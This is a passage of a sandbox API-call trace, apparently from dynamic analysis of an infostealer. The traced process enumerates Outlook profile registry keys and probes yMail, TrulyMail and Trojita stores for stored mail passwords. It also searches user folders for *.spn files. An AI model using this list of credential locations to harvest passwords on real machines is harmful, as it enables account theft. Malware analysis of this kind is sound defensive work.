returned 88 [0254.487] GetProcessHeap () returned 0x740000 [0254.487] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75a7c8 [0254.487] GetProcessHeap () returned 0x740000 [0254.488] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.488] GetProcessHeap () returned 0x740000 [0254.488] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0254.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.490] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x75b6a0 | out: phkResult=0x75b6a0*=0x204) returned 0x0 [0254.490] GetProcessHeap () returned 0x740000 [0254.491] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.491] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0254.492] GetProcessHeap () returned 0x740000 [0254.492] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.493] RegCloseKey (hKey=0x204) returned 0x0 [0254.494] GetProcessHeap () returned 0x740000 [0254.494] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0254.494] GetProcessHeap () returned 0x740000 [0254.494] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.495] RegCloseKey (hKey=0x210) returned 0x0 [0254.496] GetProcessHeap () returned 0x740000 [0254.496] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5b0 | out: hHeap=0x740000) returned 1 [0254.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.497] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xb, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19fb7c) returned 0x0 [0254.497] GetProcessHeap () returned 0x740000 [0254.497] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6b0 [0254.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.499] RegOpenKeyW (in: hKey=0x218, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x75b6b0 | out: phkResult=0x75b6b0*=0x210) returned 0x0 [0254.499] GetProcessHeap () returned 0x740000 [0254.499] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.500] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0254.500] GetProcessHeap () returned 0x740000 [0254.500] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.500] GetProcessHeap () returned 0x740000 [0254.500] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0254.501] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.502] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0254.502] GetProcessHeap () returned 0x740000 [0254.502] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75a7c8 [0254.502] GetProcessHeap () returned 0x740000 [0254.502] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.502] GetProcessHeap () returned 0x740000 [0254.502] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0254.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.504] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x75b600 | out: phkResult=0x75b600*=0x204) returned 0x0 [0254.595] GetProcessHeap () returned 0x740000 [0254.595] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.596] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0254.596] GetProcessHeap () returned 0x740000 [0254.597] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.599] RegCloseKey (hKey=0x204) returned 0x0 [0254.599] GetProcessHeap () returned 0x740000 [0254.599] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0254.599] GetProcessHeap () returned 0x740000 [0254.599] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.601] RegCloseKey (hKey=0x210) returned 0x0 [0254.601] GetProcessHeap () returned 0x740000 [0254.601] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6b0 | out: hHeap=0x740000) returned 1 [0254.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.602] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xc, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19fb7c) returned 0x0 [0254.602] GetProcessHeap () returned 0x740000 [0254.602] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0254.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.604] RegOpenKeyW (in: hKey=0x218, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x75b640 | out: phkResult=0x75b640*=0x210) returned 0x0 [0254.604] GetProcessHeap () returned 0x740000 [0254.604] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.605] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0254.605] GetProcessHeap () returned 0x740000 [0254.606] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.714] GetProcessHeap () returned 0x740000 [0254.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0254.714] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.715] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0254.715] GetProcessHeap () returned 0x740000 [0254.715] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75a7c8 [0254.715] GetProcessHeap () returned 0x740000 [0254.716] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.716] GetProcessHeap () returned 0x740000 [0254.717] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0254.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.719] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x75b610 | out: phkResult=0x75b610*=0x204) returned 0x0 [0254.719] GetProcessHeap () returned 0x740000 [0254.719] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.721] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0254.721] GetProcessHeap () returned 0x740000 [0254.721] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.723] RegCloseKey (hKey=0x204) returned 0x0 [0254.723] GetProcessHeap () returned 0x740000 [0254.723] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0254.723] GetProcessHeap () returned 0x740000 [0254.724] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.726] RegCloseKey (hKey=0x210) returned 0x0 [0254.726] GetProcessHeap () returned 0x740000 [0254.726] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0254.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.728] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xd, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19fb7c) returned 0x0 [0254.728] GetProcessHeap () returned 0x740000 [0254.728] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b690 [0254.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.730] RegOpenKeyW (in: hKey=0x218, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x75b690 | out: phkResult=0x75b690*=0x210) returned 0x0 [0254.730] GetProcessHeap () returned 0x740000 [0254.730] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.732] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0254.732] GetProcessHeap () returned 0x740000 [0254.732] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.733] GetProcessHeap () returned 0x740000 [0254.733] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0254.734] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.736] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0254.736] GetProcessHeap () returned 0x740000 [0254.737] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75a7c8 [0254.737] GetProcessHeap () returned 0x740000 [0254.737] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.810] GetProcessHeap () returned 0x740000 [0254.810] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5f0 [0254.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.811] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x75b5f0 | out: phkResult=0x75b5f0*=0x204) returned 0x0 [0254.812] GetProcessHeap () returned 0x740000 [0254.812] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0254.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.812] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0254.813] GetProcessHeap () returned 0x740000 [0254.813] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0254.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.814] RegCloseKey (hKey=0x204) returned 0x0 [0254.814] GetProcessHeap () returned 0x740000 [0254.814] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5f0 | out: hHeap=0x740000) returned 1 [0254.814] GetProcessHeap () returned 0x740000 [0254.815] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.816] RegCloseKey (hKey=0x210) returned 0x0 [0254.816] GetProcessHeap () returned 0x740000 [0254.816] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b690 | out: hHeap=0x740000) returned 1 [0254.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.817] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xe, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="", pcchName=0x19fb7c) returned 0x103 [0254.817] GetProcessHeap () returned 0x740000 [0254.817] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bab0 | out: hHeap=0x740000) returned 1 [0254.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0254.818] RegCloseKey (hKey=0x218) returned 0x0 [0254.819] GetProcessHeap () returned 0x740000 [0254.819] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b630 | out: hHeap=0x740000) returned 1 [0254.819] GetProcessHeap () returned 0x740000 [0254.819] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0254.819] GetProcessHeap () returned 0x740000 [0254.819] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b920 | out: hHeap=0x740000) returned 1 [0254.819] GetProcessHeap () returned 0x740000 [0254.819] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.820] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0254.820] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0254.820] GetProcessHeap () returned 0x740000 [0254.820] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75ca78 [0254.821] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.822] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\yMail2\\POP3.xml", arglist=0x19fae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0254.822] GetProcessHeap () returned 0x740000 [0254.822] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x62) returned 0x75a7c8 [0254.822] GetProcessHeap () returned 0x740000 [0254.822] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.823] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0254.823] GetProcessHeap () returned 0x740000 [0254.824] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.898] GetProcessHeap () returned 0x740000 [0254.899] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.899] GetProcessHeap () returned 0x740000 [0254.899] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.900] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0254.900] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0254.900] GetProcessHeap () returned 0x740000 [0254.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75ca78 [0254.901] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.902] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19fadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0254.902] GetProcessHeap () returned 0x740000 [0254.902] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x62) returned 0x75a7c8 [0254.902] GetProcessHeap () returned 0x740000 [0254.902] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.903] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0254.903] GetProcessHeap () returned 0x740000 [0254.904] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.904] GetProcessHeap () returned 0x740000 [0254.904] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.904] GetProcessHeap () returned 0x740000 [0254.904] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.905] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0254.905] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0254.905] GetProcessHeap () returned 0x740000 [0254.906] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6c) returned 0x75ca78 [0254.906] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.907] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19fad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0254.907] GetProcessHeap () returned 0x740000 [0254.907] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6a) returned 0x75a7c8 [0254.907] GetProcessHeap () returned 0x740000 [0254.908] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.909] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0254.909] GetProcessHeap () returned 0x740000 [0254.909] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.909] GetProcessHeap () returned 0x740000 [0254.909] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.910] GetProcessHeap () returned 0x740000 [0254.910] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0254.910] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0254.911] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0254.911] GetProcessHeap () returned 0x740000 [0254.911] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75ca78 [0254.911] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0254.912] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\yMail\\ymail.ini", arglist=0x19fac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0254.912] GetProcessHeap () returned 0x740000 [0254.912] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x62) returned 0x75a7c8 [0254.912] GetProcessHeap () returned 0x740000 [0254.912] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0254.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.913] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0254.913] GetProcessHeap () returned 0x740000 [0254.914] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0254.914] GetProcessHeap () returned 0x740000 [0254.914] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0254.914] GetProcessHeap () returned 0x740000 [0254.914] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0254.914] GetProcessHeap () returned 0x740000 [0254.914] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b920 [0254.914] GetProcessHeap () returned 0x740000 [0254.914] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bab0 [0254.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.915] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x75bab0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x75bab0, pcbData=0x19fa1c*=0x104) returned 0x2 [0254.915] GetProcessHeap () returned 0x740000 [0254.916] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bab0 | out: hHeap=0x740000) returned 1 [0254.916] GetProcessHeap () returned 0x740000 [0254.916] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bab0 [0254.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0254.917] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x75bab0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x75bab0, pcbData=0x19fa1c*=0x104) returned 0x2 [0254.917] GetProcessHeap () returned 0x740000 [0254.917] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bab0 | out: hHeap=0x740000) returned 1 [0254.917] GetProcessHeap () returned 0x740000 [0254.918] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0254.918] GetProcessHeap () returned 0x740000 [0254.918] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b920 | out: hHeap=0x740000) returned 1 [0254.918] GetProcessHeap () returned 0x740000 [0255.049] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8c) returned 0x75ca78 [0255.049] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.050] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19fb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0255.050] GetProcessHeap () returned 0x740000 [0255.050] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x96) returned 0x75a7c8 [0255.050] GetProcessHeap () returned 0x740000 [0255.051] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0255.051] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0255.052] GetProcessHeap () returned 0x740000 [0255.052] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0255.052] GetProcessHeap () returned 0x740000 [0255.052] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x12c) returned 0x75a7c8 [0255.052] GetProcessHeap () returned 0x740000 [0255.052] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b8a8 [0255.052] GetProcessHeap () returned 0x740000 [0255.052] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0255.053] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0255.053] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0255.054] Sleep (dwMilliseconds=0xa) [0255.256] GetProcessHeap () returned 0x740000 [0255.256] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0255.257] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.258] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0255.258] GetProcessHeap () returned 0x740000 [0255.258] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4e) returned 0x75b6c0 [0255.258] GetProcessHeap () returned 0x740000 [0255.258] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.259] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn", lpFindFileData=0x19f910 | out: lpFindFileData=0x19f910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x747e20, nFileSizeHigh=0x753f70, nFileSizeLow=0x7544a0, dwReserved0=0x0, dwReserved1=0x19f96c, cFileName="ը瞼", cAlternateFileName="뒭蕬͈읩䑇鋫ﭴ\x19䂑@")) returned 0xffffffff [0255.259] GetProcessHeap () returned 0x740000 [0255.259] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0255.259] GetProcessHeap () returned 0x740000 [0255.260] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0255.260] GetProcessHeap () returned 0x740000 [0255.260] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0255.260] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0255.261] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0255.262] Sleep (dwMilliseconds=0xa) [0255.459] GetProcessHeap () returned 0x740000 [0255.460] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0255.460] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.461] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0255.461] GetProcessHeap () returned 0x740000 [0255.461] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75b6c0 [0255.461] GetProcessHeap () returned 0x740000 [0255.462] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.462] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn", lpFindFileData=0x19f8f8 | out: 